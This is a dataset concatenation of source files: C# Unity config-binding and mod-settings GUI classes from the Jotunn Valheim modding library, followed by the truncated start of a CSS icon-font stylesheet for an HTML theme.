Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = acceptableValueRange.MinValue;
Config.Slider.maxValue = acceptableValueRange.MaxValue;
var step = Mathf.Clamp(Config.Slider.minValue / Config.Slider.maxValue, 0.1f, 1f);
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify((Mathf.Round(value / step) * step)
.ToString("F3", CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (float.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify(value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override float GetValue()
{
if (!float.TryParse(Config.InputField.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(float value)
{
Config.InputField.text = value.ToString("F3");
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// Double binding
/// </summary>
internal class ConfigBoundDouble : ConfigBound<double>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Decimal;
if (Entry.Description.AcceptableValues is AcceptableValueRange<double> acceptableValueRange)
{
Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = (float)acceptableValueRange.MinValue;
Config.Slider.maxValue = (float)acceptableValueRange.MaxValue;
var step = Mathf.Clamp(Config.Slider.minValue / Config.Slider.maxValue, 0.1f, 1f);
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify((Mathf.Round(value / step) * step)
.ToString("F3", CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (double.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify((float)value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override double GetValue()
{
if (!double.TryParse(Config.InputField.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(double value)
{
Config.InputField.text = value.ToString("F3");
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// String binding
/// </summary>
internal class ConfigBoundString : ConfigBound<string>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.None;
Config.InputField.contentType = InputField.ContentType.Standard;
}
public override string GetValue()
{
return Config.InputField.text;
}
public override void SetValue(string value)
{
Config.InputField.text = value;
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// KeyCode binding
/// </summary>
internal class ConfigBoundKeyCode : ConfigBound<KeyCode>
{
private Text Text;
public override void Register()
{
Config.Button.gameObject.SetActive(true);
Text = Config.Button.transform.Find("Text").GetComponent<Text>();
}
public override KeyCode GetValue()
{
if (Enum.TryParse(Text.text, out KeyCode temp))
{
return temp;
}
Logger.LogError($"Error parsing Keycode {Text.text}");
return KeyCode.None;
}
public override void SetValue(KeyCode value)
{
Text.text = value.ToString();
}
public void Start()
{
var buttonName = Entry.GetBoundButtonName();
Config.Button.onClick.AddListener(() =>
{
SettingsRoot.GetComponent<ModSettings>().OpenBindDialog(buttonName, KeyBindCheck);
});
}
private bool KeyBindCheck()
{
foreach (KeyCode key in Enum.GetValues(typeof(KeyCode)))
{
if (Input.GetKeyDown(key))
{
SetValue(key);
if (ZInput.m_binding != null)
{
ZInput.m_binding.m_key = key;
}
return true;
}
}
return false;
}
public override void SetEnabled(bool enabled)
{
Config.Button.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Button.enabled &= readOnly;
Text.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// KeyboardShortcut binding
/// </summary>
internal class ConfigBoundKeyboardShortcut : ConfigBound<KeyboardShortcut>
{
private static readonly IEnumerable<KeyCode> KeysToCheck = KeyboardShortcut.AllKeyCodes.Except(new[] { KeyCode.Mouse0, KeyCode.None }).ToArray();
private Text Text;
public override void Register()
{
Config.Button.gameObject.SetActive(true);
Text = Config.Button.transform.Find("Text").GetComponent<Text>();
}
public override KeyboardShortcut GetValue()
{
return KeyboardShortcut.Deserialize(Text.text);
}
public override void SetValue(KeyboardShortcut value)
{
Text.text = value.ToString();
}
public void Start()
{
var buttonName = Entry.GetBoundButtonName();
Config.Button.onClick.AddListener(() =>
{
SettingsRoot.GetComponent<ModSettings>().OpenBindDialog(buttonName, KeyBindCheck);
});
}
private bool KeyBindCheck()
{
foreach (var key in KeysToCheck)
{
if (Input.GetKeyUp(key))
{
SetValue(new KeyboardShortcut(key, KeysToCheck.Where(Input.GetKey).ToArray()));
if (ZInput.m_binding != null)
{
ZInput.m_binding.m_key = key;
}
return true;
}
}
return false;
}
public override void SetEnabled(bool enabled)
{
Config.Button.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Button.enabled &= readOnly;
Text.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// GamepadButton binding
/// </summary>
internal class ConfigBoundGamepadButton : ConfigBound<InputManager.GamepadButton>
{
public override void Register()
{
Config.Dropdown.gameObject.SetActive(true);
Config.Dropdown.AddOptions(Enum.GetNames(typeof(InputManager.GamepadButton)).ToList());
}
public override InputManager.GamepadButton GetValue()
{
if (Enum.TryParse<InputManager.GamepadButton>(Config.Dropdown.options[Config.Dropdown.value].text, out var ret))
{
return ret;
}
return InputManager.GamepadButton.None;
}
public override void SetValue(InputManager.GamepadButton value)
{
Config.Dropdown.value = Config.Dropdown.options
.IndexOf(Config.Dropdown.options.FirstOrDefault(x =>
x.text.Equals(Enum.GetName(typeof(InputManager.GamepadButton), value))));
Config.Dropdown.RefreshShownValue();
}
public void Start()
{
var buttonName = $"Joy!{Entry.GetBoundButtonName()}";
Config.Dropdown.onValueChanged.AddListener(index =>
{
if (Enum.TryParse<InputManager.GamepadButton>(Config.Dropdown.options[index].text, out var btn) &&
ZInput.instance.m_buttons.TryGetValue(buttonName, out var def))
{
KeyCode keyCode = InputManager.GetGamepadKeyCode(btn);
string axis = InputManager.GetGamepadAxis(btn);
if (!string.IsNullOrEmpty(axis))
{
def.m_key = KeyCode.None;
bool invert = axis.StartsWith("-");
def.m_axis = axis.TrimStart('-');
def.m_inverted = invert;
}
else
{
def.m_axis = null;
def.m_key = keyCode;
}
}
});
}
public override void SetEnabled(bool enabled)
{
Config.Dropdown.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Dropdown.enabled = !readOnly;
Config.Dropdown.itemText.color = readOnly ? Color.grey : Color.white;
}
}
internal class ConfigBoundColor : ConfigBound<Color>
{
public override void Register()
{
Config.ColorInput.transform.parent.gameObject.SetActive(true);
Config.ColorInput.onEndEdit.AddListener(SetButtonColor);
Config.ColorInput.characterValidation = InputField.CharacterValidation.None;
Config.ColorInput.contentType = InputField.ContentType.Alphanumeric;
Config.ColorButton.onClick.AddListener(ShowColorPicker);
}
public override Color GetValue()
{
var col = Config.ColorInput.text;
try
{
return ColorFromString(col);
}
catch (Exception e)
{
Logger.LogWarning(e);
Logger.LogWarning($"Using default value ({(Color)Entry.DefaultValue}) instead.");
return (Color)Entry.DefaultValue;
}
}
public override void SetValue(Color value)
{
Config.ColorInput.text = StringFromColor(value);
Config.ColorButton.targetGraphic.color = value;
}
public override void SetEnabled(bool enabled)
{
Config.ColorInput.enabled = enabled;
Config.ColorButton.enabled = enabled;
if (enabled)
{
Config.ColorInput.onEndEdit.AddListener(SetButtonColor);
Config.ColorButton.onClick.AddListener(ShowColorPicker);
}
else
{
Config.ColorInput.onEndEdit.RemoveAllListeners();
Config.ColorButton.onClick.RemoveAllListeners();
}
}
public override void SetReadOnly(bool readOnly)
{
Config.ColorInput.readOnly = readOnly;
Config.ColorInput.textComponent.color = readOnly ? Color.grey : Color.white;
Config.ColorButton.enabled = !readOnly;
}
private void SetButtonColor(string value)
{
if (string.IsNullOrEmpty(value))
{
return;
}
Config.ColorButton.targetGraphic.color = ColorFromString(value);
}
private void ShowColorPicker()
{
if (!ColorPicker.done)
{
ColorPicker.Cancel();
}
GUIManager.Instance.CreateColorPicker(
new Vector2(0.5f, 0.5f), new Vector2(0.5f, 0.5f), new Vector2(0.5f, 0.5f),
GetValue(), Entry.Definition.Key, SetValue, (c) => Config.ColorButton.targetGraphic.color = c,
true);
}
private string StringFromColor(Color col)
{
var r = (int)(col.r * 255f);
var g = (int)(col.g * 255f);
var b = (int)(col.b * 255f);
var a = (int)(col.a * 255f);
return $"{r:x2}{g:x2}{b:x2}{a:x2}".ToUpper();
}
private Color ColorFromString(string str)
{
if (long.TryParse(str.Trim().ToLower(), NumberStyles.HexNumber, NumberFormatInfo.InvariantInfo, out var fromHex))
{
var r = (int)(fromHex >> 24);
var g = (int)(fromHex >> 16 & 0xff);
var b = (int)(fromHex >> 8 & 0xff);
var a = (int)(fromHex & 0xff);
var result = new Color(r / 255f, g / 255f, b / 255f, a / 255f);
return result;
}
throw new ArgumentException($"'{str}' is no valid color value");
}
}
/// <summary>
/// Vector2 binding
/// </summary>
internal class ConfigBoundVector2 : ConfigBound<Vector2>
{
public override void Register()
{
Config.Vector2InputX.transform.parent.gameObject.SetActive(true);
}
public override Vector2 GetValue()
{
if (!(float.TryParse(Config.Vector2InputX.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var tempX) &&
float.TryParse(Config.Vector2InputY.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var tempY)))
{
return Default;
}
return new Vector2(tempX, tempY);
}
public override void SetValue(Vector2 value)
{
Config.Vector2InputX.text = value.x.ToString("F1");
Config.Vector2InputY.text = value.y.ToString("F1");
}
public override void SetEnabled(bool enabled)
{
Config.Vector2InputX.enabled = enabled;
Config.Vector2InputY.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Vector2InputX.readOnly = readOnly;
Config.Vector2InputX.textComponent.color = readOnly ? Color.grey : Color.white;
Config.Vector2InputY.readOnly = readOnly;
Config.Vector2InputY.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// GamepadButton binding
/// </summary>
internal class ConfigBoundEnum : ConfigBound<Enum>
{
public override void Register()
{
Config.Dropdown.gameObject.SetActive(true);
Config.Dropdown.AddOptions(Enum.GetNames(Entry.SettingType).ToList());
}
public override Enum GetValue()
{
return (Enum)Enum.Parse(Entry.SettingType, Config.Dropdown.options[Config.Dropdown.value].text);
}
public override void SetValue(Enum value)
{
Config.Dropdown.value = Config.Dropdown.options
.IndexOf(Config.Dropdown.options.FirstOrDefault(x =>
x.text.Equals(Enum.GetName(Entry.SettingType, value))));
Config.Dropdown.RefreshShownValue();
}
public override void SetEnabled(bool enabled)
{
Config.Dropdown.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Dropdown.enabled = !readOnly;
Config.Dropdown.itemText.color = readOnly ? Color.grey : Color.white;
}
}
}
}
<|start_filename|>JotunnLib/Unity/Assets/Scripts/ModSettings.cs<|end_filename|>
using System.Collections.Generic;
using System.Linq;
using UnityEngine;
using UnityEngine.UI;
namespace Jotunn.GUI
{
internal class ModSettings : MonoBehaviour
{
public GameObject PluginPrefab;
public GameObject SectionPrefab;
public GameObject ConfigPrefab;
public Image Panel;
public Text Header;
public ScrollRect ScrollRect;
public Button CurrentPluginButton;
public Button CancelButton;
public Button OKButton;
public GameObject BindDialog;
public KeyBindCheck CurrentKeyBindCheck;
public readonly Dictionary<string, ModSettingPlugin> Plugins = new Dictionary<string, ModSettingPlugin>();
public readonly List<ModSettingSection> Sections = new List<ModSettingSection>();
public readonly List<ModSettingConfig> Configs = new List<ModSettingConfig>();
public void AddPlugin(string pluginName, string text)
{
if (Plugins.ContainsKey(pluginName))
{
return;
}
var go = Instantiate(PluginPrefab, ScrollRect.content);
go.name = pluginName;
go.SetActive(true);
var plugin = go.GetComponent<ModSettingPlugin>();
plugin.Text.text = text;
Plugins.Add(pluginName, plugin);
}
public void AddSection(string pluginName, string sectionName)
{
if (!Plugins.TryGetValue(pluginName, out var plugin))
{
return;
}
var go = Instantiate(SectionPrefab, plugin.Content.transform);
go.name = sectionName;
go.SetActive(true);
var section = go.GetComponent<ModSettingSection>();
section.GUID = pluginName;
section.Text.text = sectionName;
Sections.Add(section);
}
public GameObject AddConfig(string pluginName, string entryName, Color entryColor, string description, Color descriptionColor)
{
if (!Plugins.TryGetValue(pluginName, out var plugin))
{
return null;
}
var go = Instantiate(ConfigPrefab, plugin.Content.transform);
go.SetActive(true);
var config = go.GetComponent<ModSettingConfig>();
config.Header.text = entryName;
config.Header.color = entryColor;
config.Description.text = description;
config.Description.color = descriptionColor;
Configs.Add(config);
return go;
}
public void OnScrollRectChanged(Vector2 position)
{
var overlaps = Plugins.Values.Select(x => x.Button.GetComponent<RectTransform>())
.Any(x => Overlaps(x, CurrentPluginButton.GetComponent<RectTransform>()));
CurrentPluginButton.gameObject.SetActive(!overlaps);
var currentPlugin = Plugins.Values.Select(x => x.Button)
.LastOrDefault(x =>
WorldRect(x.GetComponent<RectTransform>()).y >
WorldRect(CurrentPluginButton.GetComponent<RectTransform>()).y);
if (currentPlugin)
{
CurrentPluginButton.GetComponentInChildren<Text>().text = currentPlugin.GetComponentInChildren<Text>().text;
CurrentPluginButton.onClick = currentPlugin.onClick;
}
}
private Rect WorldRect(RectTransform rectTransform)
{
Vector2 sizeDelta = rectTransform.sizeDelta;
float rectTransformWidth = sizeDelta.x * rectTransform.lossyScale.x;
float rectTransformHeight = sizeDelta.y * rectTransform.lossyScale.y;
Vector3 position = rectTransform.position;
return new Rect(position.x - rectTransformWidth / 2f, position.y - rectTransformHeight / 2f, rectTransformWidth, rectTransformHeight);
}
private bool Overlaps(RectTransform a, RectTransform b)
{
var recta = WorldRect(a);
var rectb = WorldRect(b);
return (int)recta.y == (int)rectb.y || (recta.y + recta.height > rectb.y && recta.y < rectb.y);
}
public delegate bool KeyBindCheck();
public void OpenBindDialog(string keyName, KeyBindCheck keyBindCheck)
{
ZInput.instance.StartBindKey(keyName ?? string.Empty);
CurrentKeyBindCheck = keyBindCheck;
BindDialog.SetActive(true);
}
private void Update()
{
if (BindDialog.activeSelf && CurrentKeyBindCheck.Invoke())
{
BindDialog.SetActive(false);
}
}
public void CreateTestConfig()
{
string modName = $"Test{Plugins.Count}";
ModSettingConfig config;
AddPlugin(modName, $"Test Mod {Plugins.Count}");
AddSection(modName, "First section");
config = AddConfig(modName, "Bool Test", Color.black, "Testing booleans", Color.black)
.GetComponent<ModSettingConfig>();
config.Toggle.gameObject.SetActive(true);
config = AddConfig(modName, "String Test", Color.black, "Testing strings", Color.black)
.GetComponent<ModSettingConfig>();
config.InputField.gameObject.SetActive(true);
AddSection(modName, "Second section");
config = AddConfig(modName, "KeyCode Test", Color.black, "Testing KeyCodes", Color.black)
.GetComponent<ModSettingConfig>();
config.InputField.gameObject.SetActive(true);
config.Dropdown.gameObject.SetActive(true);
}
}
}
| heinermann/Jotunn |
<|start_filename|>theme_source/stamp-html/video-bg/6-home-style-six/assets/icons/icons.css<|end_filename|>
@charset "UTF-8";
@font-face {
font-family: "stamp-icons";
src: url("fonts/stamp-icons.woff") format("woff"),
url("fonts/stamp-icons.ttf") format("truetype");
font-weight: normal;
font-style: normal;
}
[data-icon]:before {
font-family: "stamp-icons" !important;
content: attr(data-icon);
font-style: normal !important;
font-weight: normal !important;
font-variant: normal !important;
text-transform: none !important;
speak: none;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
[class^="icon-"]:before,
[class*=" icon-"]:before {
font-family: "stamp-icons" !important;
font-style: normal !important;
font-weight: normal !important;
font-variant: normal !important;
text-transform: none !important;
speak: none;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-weather-wind-e:before {
content: "\e000";
}
.icon-weather-wind-n:before {
content: "\e001";
}
.icon-weather-wind-ne:before {
content: "\e002";
}
.icon-weather-wind-nw:before {
content: "\e003";
}
.icon-weather-wind-s:before {
content: "\e004";
}
.icon-weather-wind-se:before {
content: "\e005";
}
.icon-weather-wind-sw:before {
content: "\e006";
}
.icon-weather-wind-w:before {
content: "\e007";
}
.icon-software-add-vectorpoint:before {
content: "\e008";
}
.icon-software-box-oval:before {
content: "\e009";
}
.icon-software-box-polygon:before {
content: "\e00a";
}
.icon-software-crop:before {
content: "\e00b";
}
.icon-software-eyedropper:before {
content: "\e00c";
}
.icon-software-font-allcaps:before {
content: "\e00d";
}
.icon-software-font-kerning:before {
content: "\e00e";
}
.icon-software-horizontal-align-center:before {
content: "\e00f";
}
.icon-software-layout:before {
content: "\e010";
}
.icon-software-layout-4boxes:before {
content: "\e011";
}
.icon-software-layout-header:before {
content: "\e012";
}
.icon-software-layout-header-2columns:before {
content: "\e013";
}
.icon-software-layout-header-3columns:before {
content: "\e014";
}
.icon-software-layout-header-4boxes:before {
content: "\e015";
}
.icon-software-layout-header-4columns:before {
content: "\e016";
}
.icon-software-layout-header-complex:before {
content: "\e017";
}
.icon-software-layout-header-complex2:before {
content: "\e018";
}
.icon-software-layout-header-complex3:before {
content: "\e019";
}
.icon-software-layout-header-complex4:before {
content: "\e01a";
}
.icon-software-layout-header-sideleft:before {
content: "\e01b";
}
.icon-software-layout-header-sideright:before {
content: "\e01c";
}
.icon-software-layout-sidebar-left:before {
content: "\e01d";
}
.icon-software-layout-sidebar-right:before {
content: "\e01e";
}
.icon-software-paragraph-align-left:before {
content: "\e01f";
}
.icon-software-paragraph-align-right:before {
content: "\e020";
}
.icon-software-paragraph-center:before {
content: "\e021";
}
.icon-software-paragraph-justify-all:before {
content: "\e022";
}
.icon-software-paragraph-justify-center:before {
content: "\e023";
}
.icon-software-paragraph-justify-left:before {
content: "\e024";
}
.icon-software-paragraph-justify-right:before {
content: "\e025";
}
.icon-software-pathfinder-exclude:before {
content: "\e026";
}
.icon-software-pathfinder-intersect:before {
content: "\e027";
}
.icon-software-pathfinder-subtract:before {
content: "\e028";
}
.icon-software-pathfinder-unite:before {
content: "\e029";
}
.icon-software-pen:before {
content: "\e02a";
}
.icon-software-pencil:before {
content: "\e02b";
}
.icon-software-scale-expand:before {
content: "\e02c";
}
.icon-software-scale-reduce:before {
content: "\e02d";
}
.icon-software-vector-box:before {
content: "\e02e";
}
.icon-software-vertical-align-bottom:before {
content: "\e02f";
}
.icon-software-vertical-distribute-bottom:before {
content: "\e030";
}
.icon-music-beginning-button:before {
content: "\e031";
}
.icon-music-bell:before {
content: "\e032";
}
.icon-music-eject-button:before {
content: "\e033";
}
.icon-music-end-button:before {
content: "\e034";
}
.icon-music-fastforward-button:before {
content: "\e035";
}
.icon-music-headphones:before {
content: "\e036";
}
.icon-music-microphone-old:before {
content: "\e037";
}
.icon-music-mixer:before {
content: "\e038";
}
.icon-music-pause-button:before {
content: "\e039";
}
.icon-music-play-button:before {
content: "\e03a";
}
.icon-music-rewind-button:before {
content: "\e03b";
}
.icon-music-shuffle-button:before {
content: "\e03c";
}
.icon-music-stop-button:before {
content: "\e03d";
}
.icon-ecommerce-bag:before {
content: "\e03e";
}
.icon-ecommerce-bag-check:before {
content: "\e03f";
}
.icon-ecommerce-bag-cloud:before {
content: "\e040";
}
.icon-ecommerce-bag-download:before {
content: "\e041";
}
.icon-ecommerce-bag-plus:before {
content: "\e042";
}
.icon-ecommerce-bag-upload:before {
content: "\e043";
}
.icon-ecommerce-basket-check:before {
content: "\e044";
}
.icon-ecommerce-basket-cloud:before {
content: "\e045";
}
.icon-ecommerce-basket-download:before {
content: "\e046";
}
.icon-ecommerce-basket-upload:before {
content: "\e047";
}
.icon-ecommerce-bath:before {
content: "\e048";
}
.icon-ecommerce-cart:before {
content: "\e049";
}
.icon-ecommerce-cart-check:before {
content: "\e04a";
}
.icon-ecommerce-cart-cloud:before {
content: "\e04b";
}
.icon-ecommerce-cart-content:before {
content: "\e04c";
}
.icon-ecommerce-cart-download:before {
content: "\e04d";
}
.icon-ecommerce-cart-plus:before {
content: "\e04e";
}
.icon-ecommerce-cart-upload:before {
content: "\e04f";
}
.icon-ecommerce-cent:before {
content: "\e050";
}
.icon-ecommerce-colon:before {
content: "\e051";
}
.icon-ecommerce-creditcard:before {
content: "\e052";
}
.icon-ecommerce-diamond:before {
content: "\e053";
}
.icon-ecommerce-dollar:before {
content: "\e054";
}
.icon-ecommerce-euro:before {
content: "\e055";
}
.icon-ecommerce-franc:before {
content: "\e056";
}
.icon-ecommerce-gift:before {
content: "\e057";
}
.icon-ecommerce-graph1:before {
content: "\e058";
}
.icon-ecommerce-graph2:before {
content: "\e059";
}
.icon-ecommerce-graph3:before {
content: "\e05a";
}
.icon-ecommerce-graph-decrease:before {
content: "\e05b";
}
.icon-ecommerce-graph-increase:before {
content: "\e05c";
}
.icon-ecommerce-guarani:before {
content: "\e05d";
}
.icon-ecommerce-kips:before {
content: "\e05e";
}
.icon-ecommerce-lira:before {
content: "\e05f";
}
.icon-ecommerce-money:before {
content: "\e060";
}
.icon-ecommerce-naira:before {
content: "\e061";
}
.icon-ecommerce-pesos:before {
content: "\e062";
}
.icon-ecommerce-pound:before {
content: "\e063";
}
.icon-ecommerce-receipt:before {
content: "\e064";
}
.icon-ecommerce-sale:before {
content: "\e065";
}
.icon-ecommerce-sales:before {
content: "\e066";
}
.icon-ecommerce-tugriks:before {
content: "\e067";
}
.icon-ecommerce-wallet:before {
content: "\e068";
}
.icon-ecommerce-won:before {
content: "\e069";
}
.icon-ecommerce-yen:before {
content: "\e06a";
}
.icon-ecommerce-yen2:before {
content: "\e06b";
}
.icon-basic-elaboration-briefcase-check:before {
content: "\e06c";
}
.icon-basic-elaboration-briefcase-download:before {
content: "\e06d";
}
.icon-basic-elaboration-browser-check:before {
content: "\e06e";
}
.icon-basic-elaboration-browser-download:before {
content: "\e06f";
}
.icon-basic-elaboration-browser-plus:before {
content: "\e070";
}
.icon-basic-elaboration-calendar-check:before {
content: "\e071";
}
.icon-basic-elaboration-calendar-cloud:before {
content: "\e072";
}
.icon-basic-elaboration-calendar-download:before {
content: "\e073";
}
.icon-basic-elaboration-calendar-empty:before {
content: "\e074";
}
.icon-basic-elaboration-calendar-heart:before {
content: "\e075";
}
.icon-basic-elaboration-cloud-download:before {
content: "\e076";
}
.icon-basic-elaboration-cloud-check:before {
content: "\e077";
}
.icon-basic-elaboration-cloud-search:before {
content: "\e078";
}
.icon-basic-elaboration-cloud-upload:before {
content: "\e079";
}
.icon-basic-elaboration-document-check:before {
content: "\e07a";
}
.icon-basic-elaboration-document-graph:before {
content: "\e07b";
}
.icon-basic-elaboration-folder-check:before {
content: "\e07c";
}
.icon-basic-elaboration-folder-cloud:before {
content: "\e07d";
}
.icon-basic-elaboration-mail-document:before {
content: "\e07e";
}
.icon-basic-elaboration-mail-download:before {
content: "\e07f";
}
.icon-basic-elaboration-message-check:before {
content: "\e080";
}
.icon-basic-elaboration-message-dots:before {
content: "\e081";
}
.icon-basic-elaboration-message-happy:before {
content: "\e082";
}
.icon-basic-elaboration-tablet-pencil:before {
content: "\e083";
}
.icon-basic-elaboration-todolist-2:before {
content: "\e084";
}
.icon-basic-elaboration-todolist-check:before {
content: "\e085";
}
.icon-basic-elaboration-todolist-cloud:before {
content: "\e086";
}
.icon-basic-elaboration-todolist-download:before {
content: "\e087";
}
.icon-basic-accelerator:before {
content: "\e088";
}
.icon-basic-anticlockwise:before {
content: "\e089";
}
.icon-basic-battery-half:before {
content: "\e08a";
}
.icon-basic-bolt:before {
content: "\e08b";
}
.icon-basic-book:before {
content: "\e08c";
}
.icon-basic-book-pencil:before {
content: "\e08d";
}
.icon-basic-bookmark:before {
content: "\e08e";
}
.icon-basic-calendar:before {
content: "\e08f";
}
.icon-basic-cards-hearts:before {
content: "\e090";
}
.icon-basic-case:before {
content: "\e091";
}
.icon-basic-clessidre:before {
content: "\e092";
}
.icon-basic-cloud:before {
content: "\e093";
}
.icon-basic-clubs:before {
content: "\e094";
}
.icon-basic-compass:before {
content: "\e095";
}
.icon-basic-cup:before {
content: "\e096";
}
.icon-basic-display:before {
content: "\e097";
}
.icon-basic-download:before {
content: "\e098";
}
.icon-basic-exclamation:before {
content: "\e099";
}
.icon-basic-eye:before {
content: "\e09a";
}
.icon-basic-gear:before {
content: "\e09b";
}
.icon-basic-geolocalize-01:before {
content: "\e09c";
}
.icon-basic-geolocalize-05:before {
content: "\e09d";
}
.icon-basic-headset:before {
content: "\e09e";
}
.icon-basic-heart:before {
content: "\e09f";
}
.icon-basic-home:before {
content: "\e0a0";
}
.icon-basic-laptop:before {
content: "\e0a1";
}
.icon-basic-lightbulb:before {
content: "\e0a2";
}
.icon-basic-link:before {
content: "\e0a3";
}
.icon-basic-lock:before {
content: "\e0a4";
}
.icon-basic-lock-open:before {
content: "\e0a5";
}
.icon-basic-magnifier:before {
content: "\e0a6";
}
.icon-basic-magnifier-minus:before {
content: "\e0a7";
}
.icon-basic-magnifier-plus:before {
content: "\e0a8";
}
.icon-basic-mail:before {
content: "\e0a9";
}
.icon-basic-mail-multiple:before {
content: "\e0aa";
}
.icon-basic-mail-open-text:before {
content: "\e0ab";
}
.icon-basic-male:before {
content: "\e0ac";
}
.icon-basic-map:before {
content: "\e0ad";
}
.icon-basic-message:before {
content: "\e0ae";
}
.icon-basic-message-multiple:before {
content: "\e0af";
}
.icon-basic-message-txt:before {
content: "\e0b0";
}
.icon-basic-mixer2:before {
content: "\e0b1";
}
.icon-basic-notebook-pencil:before {
content: "\e0b2";
}
.icon-basic-paperplane:before {
content: "\e0b3";
}
.icon-basic-photo:before {
content: "\e0b4";
}
.icon-basic-picture:before {
content: "\e0b5";
}
.icon-basic-picture-multiple:before {
content: "\e0b6";
}
.icon-basic-rss:before {
content: "\e0b7";
}
.icon-basic-server2:before {
content: "\e0b8";
}
.icon-basic-settings:before {
content: "\e0b9";
}
.icon-basic-share:before {
content: "\e0ba";
}
.icon-basic-sheet-multiple:before {
content: "\e0bb";
}
.icon-basic-sheet-pencil:before {
content: "\e0bc";
}
.icon-basic-sheet-txt:before {
content: "\e0bd";
}
.icon-basic-tablet:before {
content: "\e0be";
}
.icon-basic-todo:before {
content: "\e0bf";
}
.icon-basic-webpage:before {
content: "\e0c0";
}
.icon-basic-webpage-img-txt:before {
content: "\e0c1";
}
.icon-basic-webpage-multiple:before {
content: "\e0c2";
}
.icon-basic-webpage-txt:before {
content: "\e0c3";
}
.icon-basic-world:before {
content: "\e0c4";
}
.icon-arrows-check:before {
content: "\e0c5";
}
.icon-arrows-circle-check:before {
content: "\e0c6";
}
.icon-arrows-circle-down:before {
content: "\e0c7";
}
.icon-arrows-circle-downleft:before {
content: "\e0c8";
}
.icon-arrows-circle-downright:before {
content: "\e0c9";
}
.icon-arrows-circle-left:before {
content: "\e0ca";
}
.icon-arrows-circle-minus:before {
content: "\e0cb";
}
.icon-arrows-circle-plus:before {
content: "\e0cc";
}
.icon-arrows-circle-remove:before {
content: "\e0cd";
}
.icon-arrows-circle-right:before {
content: "\e0ce";
}
.icon-arrows-circle-up:before {
content: "\e0cf";
}
.icon-arrows-circle-upleft:before {
content: "\e0d0";
}
.icon-arrows-circle-upright:before {
content: "\e0d1";
}
.icon-arrows-clockwise:before {
content: "\e0d2";
}
.icon-arrows-clockwise-dashed:before {
content: "\e0d3";
}
.icon-arrows-down:before {
content: "\e0d4";
}
.icon-arrows-down-double-34:before {
content: "\e0d5";
}
.icon-arrows-downleft:before {
content: "\e0d6";
}
.icon-arrows-downright:before {
content: "\e0d7";
}
.icon-arrows-expand:before {
content: "\e0d8";
}
.icon-arrows-glide:before {
content: "\e0d9";
}
.icon-arrows-glide-horizontal:before {
content: "\e0da";
}
.icon-arrows-glide-vertical:before {
content: "\e0db";
}
.icon-arrows-keyboard-alt:before {
content: "\e0dc";
}
.icon-arrows-keyboard-cmd-29:before {
content: "\e0dd";
}
.icon-arrows-left:before {
content: "\e0de";
}
.icon-arrows-left-double-32:before {
content: "\e0df";
}
.icon-arrows-move2:before {
content: "\e0e0";
}
.icon-arrows-remove:before {
content: "\e0e1";
}
.icon-arrows-right:before {
content: "\e0e2";
}
.icon-arrows-right-double-31:before {
content: "\e0e3";
}
.icon-arrows-rotate:before {
content: "\e0e4";
}
.icon-arrows-plus:before {
content: "\e0e5";
}
.icon-arrows-shrink:before {
content: "\e0e6";
}
.icon-arrows-slim-left:before {
content: "\e0e7";
}
.icon-arrows-slim-left-dashed:before {
content: "\e0e8";
}
.icon-arrows-slim-right:before {
content: "\e0e9";
}
.icon-arrows-slim-right-dashed:before {
content: "\e0ea";
}
.icon-arrows-squares:before {
content: "\e0eb";
}
.icon-arrows-up:before {
content: "\e0ec";
}
.icon-arrows-up-double-33:before {
content: "\e0ed";
}
.icon-arrows-upleft:before {
content: "\e0ee";
}
.icon-arrows-upright:before {
content: "\e0ef";
}
.icon-browser-streamline-window:before {
content: "\e0f0";
}
.icon-bubble-comment-streamline-talk:before {
content: "\e0f1";
}
.icon-caddie-shopping-streamline:before {
content: "\e0f2";
}
.icon-computer-imac:before {
content: "\e0f3";
}
.icon-edit-modify-streamline:before {
